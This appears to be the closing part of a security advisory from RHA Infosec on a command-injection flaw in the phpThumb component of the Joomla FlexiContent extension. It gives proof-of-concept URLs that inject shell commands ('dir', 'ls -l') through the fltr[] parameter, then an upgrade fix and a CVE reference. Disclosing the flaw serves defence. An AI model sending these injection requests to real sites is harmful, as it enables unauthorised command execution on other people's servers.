*—-*
*POC:*
*Windows-
/components/com_flexicontent/librairies/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9
-quality 75 -interlace line fail.jpg jpeg:fail.jpg %26%26 dir %26%26
&phpThumbDebug=9
*nix-
/components/com_flexicontent/librairies/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9
-quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l ;
&phpThumbDebug=9
*—-*
*Fix:*
Replace the phpthumb package being used with the latest version.
*—-*
*References:*
http://www.cvedetails.com/cve/CVE-2010-1598/
*—-*
Warm Regards,
Deepankar Arora and Rafay Baloch
RHA Infosec
评论关闭。